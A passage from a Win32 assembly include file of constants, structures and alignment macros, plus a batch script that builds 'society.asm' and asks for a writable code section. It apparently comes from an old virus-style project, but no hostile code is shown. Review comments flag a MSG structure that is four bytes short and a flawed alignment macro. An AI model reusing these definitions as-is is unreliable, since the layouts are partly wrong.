00000004h FILE_PERSISTENT_ACLS equ 00000008h FILE_FILE_COMPRESSION equ 00000010h FILE_VOLUME_IS_COMPRESSED equ 00008000h GENERIC_READ equ 80000000h GENERIC_WRITE equ 40000000h GENERIC_EXECUTE equ 20000000h GENERIC_ALL equ 10000000h DELETE equ 00010000h READ_CONTROL equ 
00020000h WRITE_DAC equ 00040000h WRITE_OWNER equ 00080000h SYNCHRONIZE equ 00100000h STANDARD_RIGHTS_RequIRED equ 000F0000h STANDARD_RIGHTS_READ equ READ_CONTROL STANDARD_RIGHTS_WRITE equ READ_CONTROL STANDARD_RIGHTS_EXECUTE equ READ_CONTROL STANDARD_RIGHTS_ALL equ 001F0000h SPECIFIC_RIGHTS_ALL equ 0000FFFFh FILE_BEGIN equ 0 FILE_CURRENT equ 1 FILE_END equ 2 ES_LEFT equ 0000h ES_CENTER equ 0001h ES_RIGHT equ 0002h ES_MULTILINE equ 0004h ES_UPPERCASE equ 0008h ES_LOWERCASE equ 0010h ES_PASSWORD equ 0020h ES_AUTOVSCROLL equ 0040h ES_AUTOHSCROLL equ 0080h ES_NOHIDESEL equ 0100h ES_OEMCONVERT equ 0400h ES_READONLY equ 0800h ES_WANTRETURN equ 1000h EN_SETFOCUS equ 0100h EN_KILLFOCUS equ 0200h EN_CHANGE equ 0300h EN_UPDATE equ 0400h EN_ERRSPACE equ 0500h EN_MAXTEXT equ 0501h EN_HSCROLL equ 0601h EN_VSCROLL equ 0602h EC_LEFTMARGIN equ 0001h EC_RIGHTMARGIN equ 0002h EC_USEFONTINFO equ 0ffffh EM_GETSEL equ 00B0h EM_SETSEL equ 00B1h EM_GETRECT equ 00B2h EM_SETRECT equ 00B3h EM_SETRECTNP equ 00B4h EM_SCROLL equ 00B5h EM_LINESCROLL equ 00B6h EM_SCROLLCARET equ 00B7h EM_GETMODIFY equ 00B8h EM_SETMODIFY equ 00B9h EM_GETLINECOUNT equ 00BAh EM_LINEINDEX equ 00BBh EM_SETHANDLE equ 00BCh EM_GETHANDLE equ 00BDh EM_GETTHUMB equ 00BEh EM_LINELENGTH equ 00C1h EM_REPLACESEL equ 00C2h EM_GETLINE equ 00C4h EM_LIMITTEXT equ 00C5h EM_CANUNDO equ 00C6h EM_UNDO equ 00C7h EM_FMTLINES equ 00C8h EM_LINEFROMCHAR equ 00C9h EM_SETTABSTOPS equ 00CBh EM_SETPASSWORDCHAR equ 00CCh EM_EMPTYUNDOBUFFER equ 00CDh EM_GETFIRSTVISIBLELINE equ 00CEh EM_SETREADONLY equ 00CFh EM_SETWORDBREAKPROC equ 00D0h EM_GETWORDBREAKPROC equ 00D1h EM_GETPASSWORDCHAR equ 00D2h EM_SETMARGINS equ 00D3h EM_GETMARGINS equ 00D4 EM_SETLIMITTEXT equ EM_LIMITTEXT EM_GETLIMITTEXT equ 00D5h EM_POSFROMCHAR equ 00D6h EM_CHARFROMPOS equ 00D7h WB_LEFT equ 0 WB_RIGHT equ 1 WB_ISDELIMITER equ 2 BS_PUSHBUTTON equ 00000000h BS_DEFPUSHBUTTON equ 00000001h BS_CHECKBOX equ 00000002h BS_AUTOCHECKBOX equ 00000003h BS_RADIOBUTTON equ 00000004h 
BS_3STATE equ 00000005h BS_AUTO3STATE equ 00000006h BS_GROUPBOX equ 00000007h BS_USERBUTTON equ 00000008h BS_AUTORADIOBUTTON equ 00000009h BS_OWNERDRAW equ 0000000Bh BS_LEFTTEXT equ 00000020h BS_TEXT equ 00000000h BS_ICON equ 00000040h BS_BITMAP equ 00000080h BS_LEFT equ 00000100h BS_RIGHT equ 00000200h BS_CENTER equ 00000300h BS_TOP equ 00000400h BS_BOTTOM equ 00000800h BS_VCENTER equ 00000C00h BS_PUSHLIKE equ 00001000h BS_MULTILINE equ 00002000h BS_NOTIFY equ 00004000h BS_FLAT equ 00008000h BS_RIGHTBUTTON equ BS_LEFTTEXT BN_CLICKED equ 0 BN_PAINT equ 1 BN_HILITE equ 2 BN_UNHILITE equ 3 BN_DISABLE equ 4 BN_DOUBLECLICKED equ 5 BN_PUSHED equ BN_HILITE BN_UNPUSHED equ BN_UNHILITE BN_DBLCLK equ BN_DOUBLECLICKED BN_SETFOCUS equ 6 BN_KILLFOCUS equ 7 BM_GETCHECK equ 00F0h BM_SETCHECK equ 00F1h BM_GETSTATE equ 00F2h BM_SETSTATE equ 00F3h BM_SETSTYLE equ 00F4h BM_CLICK equ 00F5h BM_GETIMAGE equ 00F6h BM_SETIMAGE equ 00F7h BST_UNCHECKED equ 0000h BST_CHECKED equ 0001h BST_INDETERMINATE equ 0002h BST_PUSHED equ 0004h BST_FOCUS equ 0008h SS_LEFT equ 00000000h SS_CENTER equ 00000001h SS_RIGHT equ 00000002h SS_ICON equ 00000003h SS_BLACKRECT equ 00000004h SS_GRAYRECT equ 00000005h SS_WHITERECT equ 00000006h SS_BLACKFRAME equ 00000007h SS_GRAYFRAME equ 00000008h SS_WHITEFRAME equ 00000009h SS_USERITEM equ 0000000Ah SS_SIMPLE equ 0000000Bh SS_LEFTNOWORDWRAP equ 0000000Ch SS_OWNERDRAW equ 0000000Dh SS_BITMAP equ 0000000Eh SS_ENHMETAFILE equ 0000000Fh SS_ETCHEDHORZ equ 00000010h SS_ETCHEDVERT equ 00000011h SS_ETCHEDFRAME equ 00000012h SS_TYPEMASK equ 0000001Fh SS_NOTIFY equ 00000100h SS_CENTERIMAGE equ 00000200h SS_RIGHTJUST equ 00000400h SS_REALSIZEIMAGE equ 00000800h SS_SUNKEN equ 00001000h SS_ENDELLIPSIS equ 00004000h SS_PATHELLIPSIS equ 00008000h SS_WORDELLIPSIS equ 0000C000h SS_ELLIPSISMASK equ 0000C000h CDN_FIRST equ (0-601) CDN_LAST equ (0-699) OFN_READONLY equ 00000001h OFN_OVERWRITEPROMPT equ 00000002h OFN_HIDEREADONLY equ 00000004h OFN_NOCHANGEDIR equ 00000008h 
OFN_SHOWHELP equ 00000010h OFN_ENABLEHOOK equ 00000020h OFN_ENABLETEMPLATE equ 00000040h OFN_ENABLETEMPLATEHANDLE equ 00000080h OFN_NOVALIDATE equ 00000100h OFN_ALLOWMULTISELECT equ 00000200h OFN_EXTENSIONDIFFERENT equ 00000400h OFN_PATHMUSTEXIST equ 00000800h OFN_FILEMUSTEXIST equ 00001000h OFN_CREATEPROMPT equ 00002000h OFN_SHAREAWARE equ 00004000h OFN_NOREADONLYRETURN equ 00008000h OFN_NOTESTFILECREATE equ 00010000h OFN_NONETWORKBUTTON equ 00020000h OFN_NOLONGNAMES equ 00040000h OFN_EXPLORER equ 00080000h OFN_NODEREFERENCELINKS equ 00100000h OFN_LONGNAMES equ 00200000h OFN_SHAREFALLTHROUGH equ 2 OFN_SHARENOWARN equ 1 OFN_SHAREWARN equ 0 CDN_INITDONE equ (CDN_FIRST - 0000) CDN_SELCHANGE equ (CDN_FIRST - 0001) CDN_FOLDERCHANGE equ (CDN_FIRST - 0002) CDN_SHAREVIOLATION equ (CDN_FIRST - 0003) CDN_HELP equ (CDN_FIRST - 0004) CDN_FILEOK equ (CDN_FIRST - 0005) CDN_TYPECHANGE equ (CDN_FIRST - 0006) DEBUG_PROCESS equ 00000001h DEBUG_ONLY_THIS_PROCESS equ 00000002h CREATE_SUSPENDED equ 00000004h DETACHED_PROCESS equ 00000008h CREATE_NEW_CONSOLE equ 00000010h NORMAL_PRIORITY_CLASS equ 00000020h IDLE_PRIORITY_CLASS equ 00000040h HIGH_PRIORITY_CLASS equ 00000080h REALTIME_PRIORITY_CLASS equ 00000100h CREATE_NEW_PROCESS_GROUP equ 00000200h CREATE_UNICODE_ENVIRONMENT equ 00000400h CREATE_SEPARATE_WOW_VDM equ 00000800h CREATE_SHARED_WOW_VDM equ 00001000h CREATE_FORCEDOS equ 00002000h CREATE_DEFAULT_ERROR_MODE equ 04000000h CREATE_NO_WINDOW equ 08000000h PROFILE_USER equ 10000000h PROFILE_KERNEL equ 20000000h PROFILE_SERVER equ 40000000h MAXLONGLONG equ (7fffffffffffffffh) MAXLONG equ 7fffffffh MAXBYTE equ 0ffh MAXWORD equ 0ffffh MAXDWORD equ 0ffffffffh MINCHAR equ 80h MAXCHAR equ 07fh MINSHORT equ 8000h MAXSHORT equ 7fffh MINLONG equ 80000000h THREAD_BASE_PRIORITY_LOWRT equ 15 ;// value that gets a thread to LowRealtime-1 THREAD_BASE_PRIORITY_MAX equ 2 ;// maximum thread base priority boost THREAD_BASE_PRIORITY_MIN equ -2 ;// minimum thread base priority boost 
THREAD_BASE_PRIORITY_IDLE equ -15 ;// value that gets a thread to idle THREAD_PRIORITY_LOWEST equ THREAD_BASE_PRIORITY_MIN THREAD_PRIORITY_BELOW_NORMAL equ (THREAD_PRIORITY_LOWEST+1) THREAD_PRIORITY_NORMAL equ 0 THREAD_PRIORITY_HIGHEST equ THREAD_BASE_PRIORITY_MAX THREAD_PRIORITY_ABOVE_NORMAL equ (THREAD_PRIORITY_HIGHEST-1) THREAD_PRIORITY_ERROR_RETURN equ (MAXLONG) THREAD_PRIORITY_TIME_CRITICAL equ THREAD_BASE_PRIORITY_LOWRT THREAD_PRIORITY_IDLE equ THREAD_BASE_PRIORITY_IDLE HKEY_CLASSES_ROOT equ 80000000h HKEY_CURRENT_USER equ 80000001h HKEY_LOCAL_MACHINE equ 80000002h HKEY_USERS equ 80000003h HKEY_PERFORMANCE_DATA equ 80000004h HKEY_CURRENT_CONFIG equ 80000005h HKEY_DYN_DATA equ 80000006h REG_OPTION_RESERVED equ 00000000h REG_OPTION_NON_VOLATILE equ 00000000h REG_OPTION_VOLATILE equ 00000001h REG_OPTION_CREATE_LINK equ 00000002h REG_OPTION_BACKUP_RESTORE equ 00000004h REG_OPTION_OPEN_LINK equ 00000008h REG_LEGAL_OPTION equ REG_OPTION_RESERVED or REG_OPTION_NON_VOLATILE or REG_OPTION_VOLATILE or REG_OPTION_CREATE_LINK or REG_OPTION_BACKUP_RESTORE or REG_OPTION_OPEN_LINK REG_CREATED_NEW_KEY equ 00000001h REG_OPENED_EXISTING_KEY equ 00000002h REG_WHOLE_HIVE_VOLATILE equ 00000001h REG_REFRESH_HIVE equ 00000002h REG_NO_LAZY_FLUSH equ 00000004h REG_NOTIFY_CHANGE_NAME equ 00000001h REG_NOTIFY_CHANGE_ATTRIBUTES equ 00000002h REG_NOTIFY_CHANGE_LAST_SET equ 00000004h REG_NOTIFY_CHANGE_SECURITY equ 00000008h REG_LEGAL_CHANGE_FILTER equ REG_NOTIFY_CHANGE_NAME or REG_NOTIFY_CHANGE_ATTRIBUTES or REG_NOTIFY_CHANGE_LAST_SET or REG_NOTIFY_CHANGE_SECURITY REG_NONE equ 0 REG_SZ equ 1 REG_EXPAND_SZ equ 2 REG_BINARY equ 3 REG_DWORD equ 4 REG_DWORD_LITTLE_ENDIAN equ 4 REG_DWORD_BIG_ENDIAN equ 5 REG_LINK equ 6 REG_MULTI_SZ equ 7 REG_RESOURCE_LIST equ 8 REG_FULL_RESOURCE_DESCRIPTOR equ 9 REG_RESOURCE_RequIREMENTS_LIST equ 10 KEY_QUERY_VALUE equ 0001h KEY_SET_VALUE equ 0002h KEY_CREATE_SUB_KEY equ 0004h KEY_ENUMERATE_SUB_KEYS equ 0008h KEY_NOTIFY equ 0010h KEY_CREATE_LINK equ 0020h 
; Registry access masks, built from the single-right bits defined earlier in
; this include.
KEY_READ                        equ (STANDARD_RIGHTS_READ or KEY_QUERY_VALUE or KEY_ENUMERATE_SUB_KEYS or KEY_NOTIFY) and (not SYNCHRONIZE)
KEY_WRITE                       equ (STANDARD_RIGHTS_WRITE or KEY_SET_VALUE or KEY_CREATE_SUB_KEY) and (not SYNCHRONIZE)
KEY_EXECUTE                     equ (KEY_READ) and (not SYNCHRONIZE)
KEY_ALL_ACCESS                  equ (STANDARD_RIGHTS_ALL or KEY_QUERY_VALUE or KEY_SET_VALUE or KEY_CREATE_SUB_KEY or KEY_ENUMERATE_SUB_KEYS or KEY_NOTIFY or KEY_CREATE_LINK) and (not SYNCHRONIZE)

; Service type, start type and error control values.
SERVICE_KERNEL_DRIVER           equ 000000001h
SERVICE_FILE_SYSTEM_DRIVER      equ 000000002h
SERVICE_ADAPTER                 equ 000000004h
SERVICE_RECOGNIZER_DRIVER       equ 000000008h
SERVICE_DRIVER                  equ SERVICE_KERNEL_DRIVER or SERVICE_FILE_SYSTEM_DRIVER or SERVICE_RECOGNIZER_DRIVER
SERVICE_WIN32_OWN_PROCESS       equ 000000010h
SERVICE_WIN32_SHARE_PROCESS     equ 000000020h
SERVICE_WIN32                   equ SERVICE_WIN32_OWN_PROCESS or SERVICE_WIN32_SHARE_PROCESS
SERVICE_INTERACTIVE_PROCESS     equ 000000100h
SERVICE_TYPE_ALL                equ SERVICE_WIN32 or SERVICE_ADAPTER or SERVICE_DRIVER or SERVICE_INTERACTIVE_PROCESS
SERVICE_BOOT_START              equ 0
SERVICE_SYSTEM_START            equ 000000001h
SERVICE_AUTO_START              equ 000000002h
SERVICE_DEMAND_START            equ 000000003h
SERVICE_DISABLED                equ 000000004h
SERVICE_ERROR_IGNORE            equ 0
SERVICE_ERROR_NORMAL            equ 000000001h
SERVICE_ERROR_SEVERE            equ 000000002h
SERVICE_ERROR_CRITICAL          equ 000000003h

; ====================================================================
; @wordalign Adr,x - emit one filler byte x when the distance from Adr to the
; current location is odd (the two integer quotients differ only for odd values).
@wordalign                      macro Adr,x
                                if (($-Adr)/2) NE (($-Adr+1)/2)
                                db x
                                endif
                                endm

; @dwordalign Adr,x - emit filler bytes x up to the next multiple of 4 bytes
; from Adr.
; NOTE(review): when ($-Adr) is already a multiple of 4 the expression
; 4-(($-Adr) mod 4) evaluates to 4, so four filler bytes are still emitted.
@dwordalign                     macro Adr,x
                                if 4-(($-Adr) mod 4)
                                db 4-(($-Adr) mod 4) dup (x)
                                endif
                                endm

; File-search record. Field order and sizes match the Win32 WIN32_FIND_DATA
; structure (ANSI form): attributes, three 8-byte file times, size high/low,
; two reserved dwords, 260-byte name, 14-byte short name.
f_struc                         struc           ; win32 "searchrec"
                                                ; structure
ff_attr                         dd ?            ; file attributes
ff_time_create                  dd ?,?          ; creation time (two dwords)
ff_time_lastaccess              dd ?,?          ; last access time
ff_time_lastwrite               dd ?,?          ; last write time
ff_size_hi                      dd ?            ; file size, high dword
ff_size                         dd ?            ; file size, low dword
                                dd ?,?          ; unnamed: two reserved dwords
ff_fullname                     db 260 dup (?)  ; 260 = MAX_PATH as defined in this include
ff_shortname                    db 14 dup (?)
                                ends

;GDI strucs
; Twelve-dword window class description.
WNDCLASSEX                      struc
cbSize                          dd ?
style                           dd ?
lpfnWndProc                     dd ?
cbClsExtra                      dd ?
cbWndExtra                      dd ?
hInstance                       dd ?
hIcon                           dd ?
hCursor                         dd ?
hbrBackground                   dd ?
lpszMenuName                    dd ?
lpszClassName                   dd ?
hIconSm                         dd ?
WNDCLASSEX                      ends

; Window message record.
; NOTE(review): in the Win32 MSG structure pt is a POINT (two dwords); only one
; dword is reserved for it here, so this layout is 4 bytes shorter than the
; structure the API fills in.
MSG                             struc
hwnd                            dd ?
message                         dd ?
wParam                          dd ?
lParam                          dd ?
time                            dd ?
pt                              dd ?
MSG                             ends

RECT                            struc
left                            dd ?
top                             dd ?
right                           dd ?
bottom                          dd ?
RECT                            ends

PAINTSTRUCT                     struc
hdc                             dd ?
fErase                          dd ?
rcPaint                         RECT<,,,>
fRestore                        dd ?
fIncUpdate                      dd ?
rgbReserved                     db 32 dup(?)
PAINTSTRUCT                     ends

; Window creation and DrawText constants. SW_SHOWNORMAL and WS_OVERLAPPEDWINDOW
; are defined a second time here with the same values as earlier in this include.
CW_USEDEFAULT                   equ 80000000h
SW_SHOWNORMAL                   equ 1
COLOR_WINDOW                    equ 5
IDI_APPLICATION                 equ 32512
WS_OVERLAPPEDWINDOW             equ 0CF0000h
DT_TOP                          equ 0
DT_LEFT                         equ 0
DT_CENTER                       equ 1
DT_RIGHT                        equ 2
DT_VCENTER                      equ 4
DT_BOTTOM                       equ 8
DT_WORDBREAK                    equ 10h
DT_SINGLELINE                   equ 20h
DT_EXPANDTABS                   equ 40h
DT_TABSTOP                      equ 80h
DT_NOCLIP                       equ 100h
DT_EXTERNALLEADING              equ 200h
DT_CALCRECT                     equ 400h
DT_NOPREFIX                     equ 800h
DT_INTERNAL                     equ 1000h

; Register frame left on the stack by pushad, lowest address first: EDI is at
; [esp] and EAX at [esp+28]. The code uses [esp._eax] / [esp+_eax] to store a
; value that the following popad/popa loads into EAX.
Pushad_Struc                    STRUC
_edi                            DD ?
_esi                            DD ?
_ebp                            DD ?
_esp                            DD ?
_ebx                            DD ?
_edx                            DD ?
_ecx                            DD ?
_eax                            DD ?
Pushad_Struc                    ENDS
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIN.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ
@echo off
tasm /m /ml society.asm >nul
if not exist society.obj goto err
tlink32 /Tpe /aa /x /c society.obj,,,f:\asm\inc\import32.lib >nul
del society.obj >nul
echo Make code section r/w.!
goto end
:err
echo ********* ERROR! *********
:end
@echo on
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ